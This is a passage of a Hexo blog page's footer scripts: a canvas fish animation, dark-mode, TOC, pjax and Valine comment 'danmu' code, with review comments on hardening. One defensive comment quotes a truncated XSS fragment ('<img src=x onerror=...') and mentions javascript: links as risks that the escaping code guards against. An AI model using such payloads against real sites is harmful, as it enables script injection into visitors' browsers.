    // Reset the point to its rest height with no velocity and no neighbour forces.
    init: function () {
      this.initHeight = this.renderer.height * this.renderer.INIT_HEIGHT_RATE;
      this.height = this.initHeight;
      this.fy = 0;
      this.force = { previous: 0, next: 0 };
    },
    setPreviousPoint: function (t) {
      this.previous = t;
    },
    setNextPoint: function (t) {
      this.next = t;
    },
    // Set the vertical velocity from a disturbance at y = t with vertical speed i.
    interfere: function (t, i) {
      // Sign depends on which side of this point's surface the disturbance lies.
      var sign = this.renderer.height - this.height - t >= 0 ? -1 : 1;
      this.fy = this.renderer.height * this.ACCELARATION_RATE * sign * Math.abs(i);
    },
    // Pull toward the rest height, damp the velocity, then move.
    updateSelf: function () {
      this.fy += this.SPRING_CONSTANT * (this.initHeight - this.height);
      this.fy *= this.SPRING_FRICTION;
      this.height += this.fy;
    },
    // Compute the force applied to each neighbour from the height difference.
    updateNeighbors: function () {
      if (this.previous) {
        this.force.previous = this.WAVE_SPREAD * (this.height - this.previous.height);
      }
      if (this.next) {
        this.force.next = this.WAVE_SPREAD * (this.height - this.next.height);
      }
    },
    // Apply the stored forces to the neighbours, then add this point to the current path.
    render: function (t) {
      if (this.previous) {
        this.previous.height += this.force.previous;
        this.previous.fy += this.force.previous;
      }
      if (this.next) {
        this.next.height += this.force.next;
        this.next.fy += this.force.next;
      }
      t.lineTo(this.x, this.renderer.height - this.height);
    }
  };
  var FISH = function (t) {
    // Keep the owning renderer, then run init().
    this.renderer = t;
    this.init();
  };
  // Behaviour of one fish. This is a single comma expression: the prototype
  // assignment is followed by the jQuery ready handler that starts the renderer.
  FISH.prototype = {
    // Added to or subtracted from vy each step while isOut is set (see controlStatus).
    GRAVITY: .4,
    // (Re)spawn the fish just outside the left or right edge, chosen at random.
    init: function () {
      // direction true: start past the right edge with negative vx; false: start past the left edge.
      // Note that previousY is copied from this.y before this.y is assigned in this call,
      // so on the very first init it is undefined; controlStatus overwrites it before use.
      // When the renderer is reversed the fish starts between 10% and 40% of the height
      // with positive vy/ay; otherwise between 60% and 90% with negative vy/ay.
      this.direction = Math.random() < .5, this.x = this.direction ? this.renderer.width + this.renderer.THRESHOLD : -this.renderer.THRESHOLD, this.previousY = this.y, this.vx = this.getRandomValue(4, 10) * (this.direction ? -1 : 1), this.renderer.reverse ? (this.y = this.getRandomValue(1 * this.renderer.height / 10, 4 * this.renderer.height / 10), this.vy = this.getRandomValue(2, 5), this.ay = this.getRandomValue(.05, .2)) : (this.y = this.getRandomValue(6 * this.renderer.height / 10, 9 * this.renderer.height / 10), this.vy = this.getRandomValue(-5, -2), this.ay = this.getRandomValue(-.2, -.05)), this.isOut = !1, this.theta = 0, this.phi = 0
    },
    // Random number in [t, i), built on Math.random().
    getRandomValue: function (t, i) {
      return t + (i - t) * Math.random()
    },
    // Toggle isOut and invert the vertical acceleration.
    reverseVertical: function () {
      this.isOut = !this.isOut, this.ay *= -1
    },
    // Advance the fish by one step. The parameter t is not used in the body.
    controlStatus: function (t) {
      // Order of the chained expressions:
      //   1. remember the old y, move by (vx, vy), apply ay to vy;
      //   2. compare y with height * INIT_HEIGHT_RATE (direction of the test depends on
      //      renderer.reverse): on one side GRAVITY is applied and isOut is set, on the
      //      other a new random ay is drawn if the fish was out, and isOut is cleared;
      //   3. while not out, advance the theta and phi angles (wrapped at 2*PI);
      //   4. disturb the renderer's surface at a point THRESHOLD away from x,
      //      passing the vertical distance moved;
      //   5. respawn through init() once the fish has left the canvas on its heading side.
      this.previousY = this.y, this.x += this.vx, this.y += this.vy, this.vy += this.ay, this.renderer.reverse ? this.y > this.renderer.height * this.renderer.INIT_HEIGHT_RATE ? (this.vy -= this.GRAVITY, this.isOut = !0) : (this.isOut && (this.ay = this.getRandomValue(.05, .2)), this.isOut = !1) : this.y < this.renderer.height * this.renderer.INIT_HEIGHT_RATE ? (this.vy += this.GRAVITY, this.isOut = !0) : (this.isOut && (this.ay = this.getRandomValue(-.2, -.05)), this.isOut = !1), this.isOut || (this.theta += Math.PI / 20, this.theta %= 2 * Math.PI, this.phi += Math.PI / 30, this.phi %= 2 * Math.PI), this.renderer.generateEpicenter(this.x + (this.direction ? -1 : 1) * this.renderer.THRESHOLD, this.y, this.y - this.previousY), (this.vx > 0 && this.x > this.renderer.width + this.renderer.THRESHOLD || this.vx < 0 && this.x < -this.renderer.THRESHOLD) && this.init()
    },
    // Draw the fish on 2D context t, then advance it with controlStatus().
    render: function (t) {
      // Three filled paths are drawn in a frame translated to (x, y), rotated along the
      // velocity and mirrored by direction: a closed bezier outline, a second shape at
      // x = 40 whose width oscillates with sin(theta), and a third shape rotated by an
      // angle that oscillates with sin(phi) and mirrors when the renderer is reversed
      // (presumably body, tail and fin). Each save() is matched by a restore().
      t.save(), t.translate(this.x, this.y), t.rotate(Math.PI + Math.atan2(this.vy, this.vx)), t.scale(1, this.direction ? 1 : -1), t.beginPath(), t.moveTo(-30, 0), t.bezierCurveTo(-20, 15, 15, 10, 40, 0), t.bezierCurveTo(15, -10, -20, -15, -30, 0), t.fill(), t.save(), t.translate(40, 0), t.scale(.9 + .2 * Math.sin(this.theta), 1), t.beginPath(), t.moveTo(0, 0), t.quadraticCurveTo(5, 10, 20, 8), t.quadraticCurveTo(12, 5, 10, 0), t.quadraticCurveTo(12, -5, 20, -8), t.quadraticCurveTo(5, -10, 0, 0), t.fill(), t.restore(), t.save(), t.translate(-3, 0), t.rotate((Math.PI / 3 + Math.PI / 10 * Math.sin(this.phi)) * (this.renderer.reverse ? -1 : 1)), t.beginPath(), this.renderer.reverse ? (t.moveTo(5, 0), t.bezierCurveTo(10, 10, 10, 30, 0, 40), t.bezierCurveTo(-12, 25, -8, 10, 0, 0)) : (t.moveTo(-5, 0), t.bezierCurveTo(-10, -10, -10, -30, 0, -40), t.bezierCurveTo(12, -25, 8, -10, 0, 0)), t.closePath(), t.fill(), t.restore(), t.restore(), this.controlStatus(t)
    }
  }, $(function () {
    // Start the animation once the DOM is ready.
    RENDERER.init()
    // On a click on the dark-mode toggle, re-read the fish colour in a zero-delay
    // timeout (so it runs after the current click handlers) and fill the context.
    $('.dark').click(function () {
      setTimeout(() => {
        RENDERER.setFishColor();
        RENDERER.context.fill();
      });
    })
  });
</script>
  <div class="footer bg-color">
    <div class="footer-main">
      
        
          <div class="link">
            
              
                <a href="mailto:2985409357@qq.com" class="social">
                  
                    <i class="fa fa-envelope" aria-hidden="true"></i>
                  
                </a>
              
            
              
                <a target="_blank" rel="noopener" href="https://github.com/yangyang-linux" class="social">
                  
                    <i class="fab fa-github" aria-hidden="true"></i>
                  
                </a>
              
            
              
                <a href="tencent://AddContact/?fromId=50&amp;fromSubId=1&amp;subcmd=all&amp;uin=2985409357" class="social">
                  
                    <i class="fab fa-qq" aria-hidden="true"></i>
                  
                </a>
              
            
          </div>
        
      
        
          <div class="footer-copyright">
            <p>Copyright © 2019 - <span id="display_copyright_time"></span> <a target="_blank" rel="noopener" href="https://gitee.com/yangyang-linux">yangyang-linux</a> | Powered by <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a> | Theme <a target="_blank" rel="noopener" href="https://github.com/yuang01/theme">Bamboo</a></p>

          </div>
        
      
        
          
            <!-- 不蒜子统计 -->
            <!-- 不蒜子统计 -->
<span id="busuanzi_container_site_pv">
      <i class="fas fa-eye" aria-hidden="true"></i>本站总访问量：<span id="busuanzi_value_site_pv"></span> 次
</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv" style='display:none'>
      <i class="fas fa-users" aria-hidden="true"></i>本站访客数：<span id="busuanzi_value_site_uv"></span> 人
</span>

          
        
      
        
          <div class="footer-custom">
            
              <div><p><span>本博客已萌萌哒地运行</span><span id="display_live_time"></span></p>
</div>
            
          </div>
        
      
		</br>
		</br>
		</br>
    </div>
  </div>



    <!-- 渲染暗黑按钮 -->
    
      <div class="dark">
  <div class="dark-content">
    <i class="fas fa-moon" aria-hidden="true"></i>
    <!-- <span>关灯</span> -->
  </div>
  
</div>

<script>
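  $(function() {
    // Replace the toggle's content with the icon for the given state:
    // a light bulb while dark mode is on, a moon while it is off.
    const showIcon = function (iconName) {
      $(".dark-content").replaceWith(
        "<div class='dark-content'><i class=\"fas " + iconName + "\" aria-hidden=\"true\"></i></div>"
      );
    };

    // Persisted preference. A missing key yields null. A value that is not valid
    // JSON, or storage that is blocked, falls back to light mode instead of
    // throwing inside the ready handler.
    let isDark = false;
    try {
      isDark = Boolean(JSON.parse(localStorage.getItem('dark')));
    } catch (err) {
      isDark = false;
    }
    if (isDark) {
      showIcon('fa-lightbulb');
    }

    $('.dark').click(function() {
      // The body class is the source of truth for the current mode.
      const enable = !$(document.body).is('.darkModel');
      $(document.body).toggleClass('darkModel', enable);
      try {
        localStorage.setItem('dark', enable);
      } catch (err) {
        // Storage unavailable: the choice still applies to this page, it is just not persisted.
      }
      showIcon(enable ? 'fa-lightbulb' : 'fa-moon');
    })
  })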
</script>
    
    <!-- 渲染回到顶部按钮 -->
    
      <div class="goTop top-btn-color" pointer>
  <i class="fas fa-arrow-up" aria-hidden="true"></i>
</div>
<script src="/js/goTop.js"></script>

    
    <!-- 渲染左下角音乐播放器 -->
    
      <link rel="stylesheet" href="/js/aplayer/APlayer@1.10.1.min.css">
<style>
.aplayer .aplayer-lrc p {
  
  font-size: 12px;
  font-weight: 700;
  line-height: 16px !important;
}

.aplayer .aplayer-lrc p.aplayer-lrc-current {
  
  font-size: 15px;
  color: #C90041;
}


.aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
  left: -66px !important;
}

.aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
  left: 0px !important;
}


</style>
<meting-js  
  class=""
  server="netease"
  type="playlist"
  id="5300120281"
  fixed='true'
  autoplay='true'
  theme='#C90041'
  loop='all'
  order='random'
  preload='auto'
  volume='0.4'
  list-folded='true'
>
</meting-js>

<!-- <style>
  #aplayer {
    position: fixed;
    left: 0;
    bottom: 300px;
  }
</style> -->
<!-- NOTE(review): both scripts run with full access to this page and are fetched from a public CDN without an integrity attribute. "meting@2" is a version range, not an exact version, so the file served can change without this page changing. Pinning an exact version and adding integrity + crossorigin, or self-hosting as is done for the /js/ assets, narrows that exposure. -->
<script src="https://unpkg.com/aplayer@1.10.1/dist/APlayer.min.js"></script>
<script src="https://unpkg.com/meting@2/dist/Meting.min.js"></script>
    

    <!-- 图片放大 -->
    
      <script src="/js/fancybox/jquery.fancybox.min.js"></script>
    

    <!-- 百度解析 -->
    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
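    (function () {
        // Baidu link-submit loader: inject the push script before the first <script> element.
        // It is always fetched over HTTPS. The previous fallback to an http:// URL on
        // non-HTTPS pages let the script body be altered in transit before it ran here.
        var bp = document.createElement('script');
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();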
</script>

    
    <!-- 背景彩带 -->
    
      <script type="text/javascript" size="100" alpha='0.4' zIndex="-1" src="/js/ribbon.min.js"></script>
    

    <script src="/js/utils/index.js"></script>
    <script src="/js/app.js"></script>
    
    <!-- 文章目录所需js -->
<link href="/js/tocbot/tocbot.css" rel="stylesheet">
<script src="/js/tocbot/tocbot.min.js"></script>

<script>
  // Heading levels that take part in the table of contents.
  var headerEl = 'h1, h2, h3, h4, h5, h6';
  // Container that holds the article body.
  var content = '.post-detail';
  // Heading ids generated so far, used to decide whether an index suffix is needed.
  var idArr = {};
  // tocbot configuration.
  var option = {
    // Where to render the table of contents.
    tocSelector: '.toc',
    // Where to grab the headings to build the table of contents.
    contentSelector: content,
    // Which headings to grab inside of the contentSelector element.
    headingSelector: headerEl,
    scrollSmooth: true,
    scrollSmoothOffset: -80,
    headingsOffset: -($(window).height() * 0.4 - 45),
    positionFixedSelector: '.toc-main',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    activeLinkClass: 'is-active-link',
    // onClick: function (e) {},
  };
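  if ($('.toc').length > 0) {

    // Give every direct-child heading of the article an id derived from its text.
    $(content).children(headerEl).each(function () {
      // Strip whitespace and punctuation, then lower-case.
      var headerId = $(this).text().replace(/[\s|\~|`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\||\|\[|\]|\{|\}|\;|\:|\"|\'|\,|\<|\.|\>|\/|\?|\：|\，|\。]/g, '');
      headerId = headerId.toLowerCase();
      // idArr is a plain object, so a heading whose text equals an inherited property
      // name ("constructor", "tostring", "__proto__") would look "already seen" and get
      // a broken id. Prefixing the bookkeeping key keeps it clear of those names.
      // The id itself is set with .attr(), so heading text is never parsed as HTML.
      var seenKey = 'h:' + headerId;
      if (idArr[seenKey]) {
        // Id already used: append the running index.
        $(this).attr('id', headerId + '-' + idArr[seenKey]);
        idArr[seenKey]++;
      }
      else {
        // First heading with this id.
        idArr[seenKey] = 1;
        $(this).attr('id', headerId);
      }
    });

    document.addEventListener("DOMContentLoaded", function () {
      tocbot.init(option);
      mobileTocClick();
    });

  }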

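  // Scroll handler that keeps the active TOC entry in view.
  // The throttled wrapper is created once and reused. The previous version built a
  // new wrapper on every scroll event and called it immediately, so no rate limit
  // could carry over between events.
  // NOTE(review): assumes bamboo.throttle returns a function that keeps its timing
  // state in a closure; confirm in /js/utils/index.js.
  window.tocScrollFn = (function () {
    var throttled = null;
    return function () {
      if (!throttled) {
        throttled = bamboo.throttle(function () {
          findHeadPosition();
        }, 100);
      }
      return throttled();
    };
  })();
  window.addEventListener('scroll', tocScrollFn);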

  // Queue a TOC auto-scroll when a rendered TOC list exists; returns false otherwise.
  // The `top` parameter is not used.
  const findHeadPosition = function (top) {
    const hasTocList = $('.toc-list').length > 0;
    if (!hasTocList) {
      return false;
    }
    // Defer to the next task instead of running inside the scroll handler.
    setTimeout(function () {
      autoScrollToc();
    }, 0);
  }

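  // Scroll the TOC panel by 150px when the active link is within 100px of the
  // bottom or top of the viewport.
  const autoScrollToc = function () {
    const $activeItem = document.querySelector('.is-active-link');
    const $cardToc = document.querySelector('.toc-content');
    // Either element can be absent (no heading active yet, or a page without the
    // TOC panel); this runs from a scroll timer, so return instead of throwing.
    if (!$activeItem || !$cardToc) {
      return;
    }
    const activePosition = $activeItem.getBoundingClientRect().top
    const sidebarScrollTop = $cardToc.scrollTop
    if (activePosition > (document.documentElement.clientHeight - 100)) {
      $cardToc.scrollTop = sidebarScrollTop + 150
    }
    if (activePosition < 100) {
      $cardToc.scrollTop = sidebarScrollTop - 150
    }
  }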

  // Tear tocbot down before pjax replaces the page content.
  document.addEventListener('pjax:send', () => {
    const hasToc = $('.toc').length;
    if (hasToc) {
      tocbot.destroy();
    }
  });

  // Rebuild tocbot and the mobile toggle for the newly loaded content.
  document.addEventListener('pjax:complete', () => {
    const hasToc = $('.toc').length;
    if (hasToc) {
      tocbot.init(option);
      mobileTocClick();
    }
  });
  
  // 手机端toc按钮点击出现目录
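  // Wire the mobile TOC button: it opens or closes the TOC panel, and a click
  // inside the panel closes it on narrow screens.
  const mobileTocClick = function () {
    const $cardTocLayout = document.getElementsByClassName('toc-aside')[0];
    // Without the panel there is nothing to toggle; return instead of throwing.
    if (!$cardTocLayout) {
      return;
    }
    const $cardToc = $cardTocLayout.getElementsByClassName('toc-content')[0];
    const $button = document.getElementById('toc-mobile-btn');
    // The panel sits further from the right edge on mid-width screens.
    let right = '45px';
    if (window.innerWidth >= 551 && window.innerWidth <= 992) {
      right = '100px'
    }
    const mobileToc = {
      open: () => {
        $cardTocLayout.style.cssText = 'animation: toc-open .3s; opacity: 1; right: ' + right
      },

      close: () => {
        $cardTocLayout.style.animation = 'toc-close .2s'
        // Clear the inline styles after the close animation has started.
        setTimeout(() => {
          $cardTocLayout.style.cssText = "opacity:''; animation: ''; right: ''"
        }, 100)
      }
    }
    if ($button) {
      $button.addEventListener('click', () => {
        // Computed opacity "0" means the panel is hidden.
        if (window.getComputedStyle($cardTocLayout).getPropertyValue('opacity') === '0') mobileToc.open()
        else mobileToc.close()
      })
    }

    if ($cardToc) {
      $cardToc.addEventListener('click', (e) => {
        if (window.innerWidth < 992) { // below 992px
          mobileToc.close()
        }
      })
    }
  }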
</script>

<style>
  .is-position-fixed {
    position: sticky !important;
    top: 74px;
  }

  .toc-main ul {
    counter-reset: show-list;
  }

  .toc-main ul li::before {
    content: counter(item)".";
    display: block;
    position: absolute;
    left: 12px;
    top: 0;
  }
</style> 

<!-- 设置导航背景 -->
<script>
  // Add the solid header background once the page is scrolled past the header's
  // own height, and remove it again above that point.
  let setHeaderClass = () => {
    const headerMenuTransparent = true;
    if (headerMenuTransparent) {
      const $nav = $('#navHeader');
      const navHeight = $nav.outerHeight();
      const scrolled = $(window).scrollTop();
      $nav.toggleClass('header-bg-color', scrolled > navHeight);
    }
  };

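  // Scroll handler for the header background.
  // The throttled wrapper is created once and reused. The previous version built a
  // new wrapper on every scroll event and called it immediately, so no rate limit
  // could carry over between events.
  // NOTE(review): assumes bamboo.throttle returns a function that keeps its timing
  // state in a closure; confirm in /js/utils/index.js.
  let scrollCollect = (() => {
    let throttled = null;
    return () => {
      if (!throttled) {
        throttled = bamboo.throttle(function (e) {
          setHeaderClass();
        }, 200);
      }
      return throttled();
    };
  })();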

  // Named entry point that applies the header state once.
  let initHeaderBg = () => setHeaderClass();

  // Apply the state now and keep it updated while scrolling.
  setHeaderClass();
  window.addEventListener('scroll', scrollCollect);

  // Detach the scroll listener during a pjax navigation and re-attach it afterwards.
  document.addEventListener('pjax:send', () => {
    window.removeEventListener('scroll', scrollCollect);
  });
  document.addEventListener('pjax:complete', () => {
    window.addEventListener('scroll', scrollCollect);
    setHeaderClass();
  });
</script> 

<!-- 渲染issues标签里的内容 -->
<script>
  // Load the issues renderer only when the article contains an .issues-api element.
  function loadIssuesJS() {
    var placeholders = $(".post-detail").find(".issues-api");
    if (placeholders.length != 0) {
      loadScript('/js/issues/index.js');
    }
  };
  // Run on first load.
  $(loadIssuesJS);
  // After a pjax navigation, run again unless the renderer has already been loaded.
  document.addEventListener('pjax:complete', () => {
    var alreadyLoaded = typeof IssuesAPI != "undefined";
    if (!alreadyLoaded) {
      loadIssuesJS();
    }
  })
</script>

<!-- 输入框打字特效 -->
<!-- 输入框打字特效 -->

  <script src="/js/activate-power-mode.js"></script>
  <script>
    // Random colours on, input-box shake off.
    Object.assign(POWERMODE, { colorful: true, shake: false });
    // Run the effect on every input event that reaches <body>.
    document.body.addEventListener('input', POWERMODE);
  </script>


<!-- markdown代码一键复制功能 -->

  <!-- NOTE(review): these URLs carry no version, so the CDN serves whatever release is current, and there is no integrity attribute to detect a changed file. The script runs with full access to the page; pin an exact version and add integrity + crossorigin, or self-host it. -->
  <link rel="stylesheet" href="https://unpkg.com/v-plugs-ayu/lib/ayu.css">
  <script src="https://unpkg.com/v-plugs-ayu/lib/ayu.umd.min.js"></script>
  <script src="/js/clipboard/clipboard.min.js"></script>
  <div id="appCopy">
  </div>
  <script data-pjax>
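    // Vue instance that adds a "copy" button to every code block in the article
    // and shows a notification after a copy.
    var vm = new Vue({
      el: '#appCopy',
      data: {
      },
      computed: {
      },
      mounted() {
        const that = this;
        var copy = '复制';

        // Toast shown after a copy.
        function notifyCopied() {
          that.$notify({
            title: "成功",
            content: "代码已复制，请遵守相关授权协议。",
            type: 'success'
          })
        }

        /* code */
        var initCopyCode = function () {
          // type="button" keeps the button from submitting an enclosing form.
          var copyHtml = '';
          copyHtml += '<button type="button" class="btn-copy" data-clipboard-snippet="" style="position:absolute;top:0;right:0;z-index:1;">';
          copyHtml += '<i class="fas fa-copy"></i><span>' + copy + '</span>';
          copyHtml += '</button>';
          $(".post-detail pre").not('.gutter pre').wrap("<div class='codeBox' style='position:relative;width:100%;'></div>")
          $(".post-detail pre").not('.gutter pre').before(copyHtml);
          // This script runs again after every pjax navigation (data-pjax). Drop the
          // previous ClipboardJS instance so listeners do not accumulate.
          if (window.codeCopyClipboard) {
            window.codeCopyClipboard.destroy();
          }
          window.codeCopyClipboard = new ClipboardJS('.btn-copy', {
            // Copy the <pre> that follows the clicked button.
            target: function (trigger) {
              return trigger.nextElementSibling;
            }
          });
          // Announce success only when the copy succeeded. The previous click
          // handler showed the toast even when the clipboard write was refused.
          window.codeCopyClipboard.on('success', notifyCopied);
        }
        initCopyCode();
        // NOTE(review): this replaces every jQuery keypress handler on document, and a
        // keypress event with ctrlKey and keyCode 67 may never fire for Ctrl+C in
        // current browsers. Kept as is; confirm whether it is still needed.
        $(document).unbind('keypress').bind('keypress', function (e) {
          if (e.ctrlKey && e.keyCode == 67) {
            notifyCopied();
          }
        })
      },
      methods: {
      },
      created() { }
    })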
  </script>
  

<!-- 图片懒加载 -->
<script defer src="https://unpkg.com/vanilla-lazyload@17.1.0/dist/lazyload.min.js"></script>
<script>
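  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazyload",
    threshold: 0
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  // The library comes from a third-party CDN. If it is blocked or has not
  // initialised yet, no instance exists, so check before calling update()
  // instead of throwing a ReferenceError inside the event handler.
  document.addEventListener('DOMContentLoaded', function () {
    if (window.lazyLoadInstance) {
      window.lazyLoadInstance.update();
    }
  });
  document.addEventListener('pjax:complete', function () {
    if (window.lazyLoadInstance) {
      window.lazyLoadInstance.update();
    }
  });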
</script>


<!-- 卡片滚动动画 -->

    <script type="text/javascript">
  loadScript("https://unpkg.com/scrollreveal@4.0.6/dist/scrollreveal.min.js")
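  // Register the reveal animation for every .reveal element.
  function pjax_scrollrebeal() {
    // ScrollReveal is injected by loadScript() from a third-party CDN. A pjax
    // navigation can complete before it has arrived, or after it failed to load,
    // so skip the call in that case instead of throwing.
    if (typeof ScrollReveal == "undefined") {
      return;
    }
    ScrollReveal().reveal('.reveal', {
      distance: '120px',
      duration: '400',
      interval: '30',
      scale: '1',
      origin: 'bottom', // side the animation starts from
      easing: 'ease'
    });
  }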
  $(function () {
    // Poll every 100ms until #safearea is displayed as a block and the library
    // is defined, then stop polling and register the animations once.
    var checkScrollReveal = setInterval(function () {
      var areaVisible = $("#safearea").css("display") == "block";
      if (!areaVisible) {
        return;
      }
      if (typeof ScrollReveal == "undefined") {
        return;
      }
      clearInterval(checkScrollReveal);
      pjax_scrollrebeal();
    }, 100)
  });
  // Register again for content swapped in by pjax.
  document.addEventListener('pjax:complete', () => {
    pjax_scrollrebeal();
  })
</script>
   

<!-- 评论所需js -->

  
    <!-- 弹幕所需的css和js -->
    
  <!-- 弹幕插件 -->
  <link href="/js/danmu/barrager.css" rel="stylesheet">
  <script src="/js/danmu/jquery.barrager.js"></script>

<!-- 具体js，请前往valine/script.ejs查看 -->

    <script>
  // Comment form fields that must be filled in, from a comma-separated list.
  var requiredFields = 'nick'.split(',');
  // Selector of the comment area; its presence decides whether Valine is started.
  comment_el = '.comment';
  // Interval id of the running danmu loop, if any.
  let looperValine = null;
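  // Start the Valine comment widget and, when enabled, replay the page's comments
  // as "danmu" (bullet comments) through the jquery.barrager plugin.
  load_valine = function () {
    // Nothing to do on pages without a comment area.
    if (!$(comment_el).length) {
      return;
    }

    // NOTE(review): app_id and app_key are delivered to every visitor, so they
    // cannot act as a secret. What a visitor can read or write depends on the
    // backend's access rules for the comment class; verify that those are restricted.
    var valine = new Valine({
      el: '#vcomment',
      path: window.location.pathname,
      notify: false,
      verify: false,
      app_id: "HvvYcruryPsiW2egxIpRnlKV-gzGzoHsz",
      app_key: "MLKN1tH2RNDMR4e3O9PJgAh5",
      placeholder: "客官，说点什么吧（如果想让我及时收到的话可以连续发送两遍，会触发邮件提醒机制）",
      avatar: "wavatar",
      master: "3d28ff93d17df2e86f7971eda5159791",   // MD5 of the blog owner's e-mail
      tagMeta: ["博主","小伙伴","访客"],     // badge labels
      friends: "8b42635701290c05327f3faba356ce6e",
      metaPlaceholder: { "nick": "昵称/QQ号", "mail": "邮箱" },
      requiredFields: requiredFields,
      enableQQ: true,
    });

    // Collapse a burst of calls into one call, 200ms after the last of them.
    function debounce(fn) {
      var timerID = null
      return function () {
        var arg = arguments[0]   // the event
        if (timerID) {
          clearTimeout(timerID)
        }
        timerID = setTimeout(function () {
          fn(arg)              // pass the event on
        }, 200)
      }
    }

    // Everything below handles comment fields, which are written by visitors and
    // must be treated as untrusted.

    // Plain text of a stored comment. DOMParser builds an inert document (scripts
    // do not run, resources are not fetched), so the markup can be parsed safely.
    // The previous regex tag-strip ran after truncation and could leave a
    // half-cut tag such as "<img src=x onerror=..." in the output.
    function commentText(html) {
      var doc = new DOMParser().parseFromString(String(html || ''), 'text/html');
      return doc.body ? (doc.body.textContent || '') : '';
    }

    // Escape text for insertion as HTML.
    // NOTE(review): assumes jquery.barrager inserts `info` as HTML, which the
    // original tag stripping also implies; confirm in /js/danmu/jquery.barrager.js.
    function escapeHtml(text) {
      return String(text).replace(/[&<>"']/g, function (ch) {
        return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[ch];
      });
    }

    // Accept only http(s) links. Any other scheme, such as javascript:, would run
    // script in this origin when the danmu is clicked.
    function safeHttpUrl(url) {
      var value = String(url || '');
      return /^https?:\/\//i.test(value) ? value : '';
    }

    // The constant values below are what the theme template rendered. The original
    // passed them through eval(); literals give the same values and do not
    // require a CSP that allows eval.
    var themeDanmu = true;
    var themeLoop = false;
    var themeLooperTime = '5000';
    var speed = '20';
    var isBarrager = true;

    if (themeDanmu == true) {
      do_barrager();
      if ($('.danmuBox').length <= 0) {
        $('.navbar').append('<div class="danmuBox"><div class="danmuBtn open"><span class="danmuCircle"></span><span class="danmuText">弹幕</span></div></div>');
      }
      // Toggle button: stop and clear the danmu, or start them again.
      $('.danmuBtn').on('click', debounce(
        function () {
          if ($('.danmuBtn').hasClass('open')) {
            $('.danmuBtn').removeClass('open')
            clearInterval(looperValine);
            $.fn.barrager.removeAll();
          } else {
            $('.danmuBtn').addClass("open");
            do_barrager();
          }
        }
      ))
    }

    // Fetch the comments of the current page and emit them one per interval.
    function do_barrager() {
      isBarrager && valine.Q(window.location.pathname).find().then(function (comments) {
        var run_once = true;
        var looper_time = themeLooperTime;
        var total = comments.length;
        var index = 0;
        if (total > 0) {
          barrager();
        }

        function barrager() {
          if (run_once) {
            // First call: start the interval that emits the remaining comments.
            looperValine = setInterval(barrager, looper_time);
            run_once = false;
          }
          var data = comments[index]._serverData;
          // At most 50 characters of the comment's text, escaped for HTML insertion.
          var newcontent = escapeHtml(commentText(data.comment).substring(0, 50));
          // The mail field goes into a query string: percent-encode it so it cannot
          // add parameters or break out of a quoted attribute.
          var avatarKey = encodeURIComponent(data.mail || '').replace(/'/g, '%27');
          // Publish one danmu.
          const item = {
            img: `https://q1.qlogo.cn/g?b=qq&nk=${avatarKey}&s=640`, // avatar
            info: newcontent, // text
            href: safeHttpUrl(data.link), // link, http(s) only
            close: true, // show the close button
            speed: speed, // delay in seconds
            color: '#fff', // text colour
            old_ie_color: '#000000', // fallback colour for old IE, must differ from the page background
          }
          $('body').barrager(item);
          index++;
          // All comments emitted: stop the interval, then loop or switch the button off.
          if (index == total) {
            clearInterval(looperValine);
            if (themeLoop === true) {
              setTimeout(function () {
                do_barrager();
              }, 5000);
            } else {
              $('.danmuBtn').removeClass('open');
            }
            return false;
          }
        }
      })
    }
  };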
  // Start the comment widget on first load.
  $(load_valine);
  // Before a pjax navigation: remove the danmu toggle, stop the loop, clear the screen.
  document.addEventListener('pjax:send', (e) => {
    if ($('.danmuBox').length > 0) {
      $('.danmuBox').remove();
    }
    if (looperValine) {
      clearInterval(looperValine);
    }
    $.fn.barrager.removeAll();
  })
  // After a pjax navigation: start the widget for the new page.
  document.addEventListener('pjax:complete', () => {
    load_valine();
  });
</script>

  


<!-- 鼠标点击特效 -->
<!-- 爱心点击 -->

  
    <script src="/js/cursor/fireworks.js"></script>
  




  <!-- NOTE(review): a protocol-relative URL is fetched over plain HTTP whenever the page itself is served over HTTP, so this third-party script can be altered in transit. Prefer an explicit https: URL if the host supports it. -->
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" data-pjax></script>


    <!-- pjax -->
    

<!-- pjax -->


  <script src="/js/pjax@0.2.8/index.js"></script>
  
    <!-- 样式位于：source/css/_third-party/pjaxanimate.styl -->

<div class="pjax-animate">
  
    <div class="loading-circle"><div id="loader-circle"></div></div>
    <script>
      // Show or hide the loading indicator by switching its display property.
      const setLoadingDisplay = (value) => {
        $(".loading-circle").css("display", value);
      };
      window.ShowLoading = () => { setLoadingDisplay("block"); };
      window.HideLoading = () => { setLoadingDisplay("none"); };
    </script>
  
	<script>
    // Loading indicator: shown while a pjax request is in flight, hidden when it
    // completes or fails.
    document.addEventListener('pjax:send', () => {
      window.ShowLoading();
    })
    document.addEventListener('pjax:complete', () => {
      window.HideLoading();
    })
    document.addEventListener('pjax:error', () => {
      window.HideLoading();
    })
	</script>
</div>

  

  <script>
    var pjax = new Pjax({
      // Intercept ordinary links. In-page anchors, javascript:void(0) links and
      // links marked with the no-pjax attribute are left to the browser.
      elements: 'a[href]:not([href^="#"]):not([href="javascript:void(0)"]):not([no-pjax])',
      // Regions replaced on navigation.
      selectors: ["#pjax-container","title"],
      timeout: 5000,
      // When true, a timestamp is appended to the URL to bypass the browser cache.
      cacheBust: false
    });

    document.addEventListener('pjax:send', function (e) {

      // Paths that trigger a full page load instead of pjax. A single empty entry
      // leaves the list disabled. Failures here are swallowed by the catch below,
      // as in the original, for example when the event carries no triggerElement.
      try {
        var currentUrl = window.location.pathname;
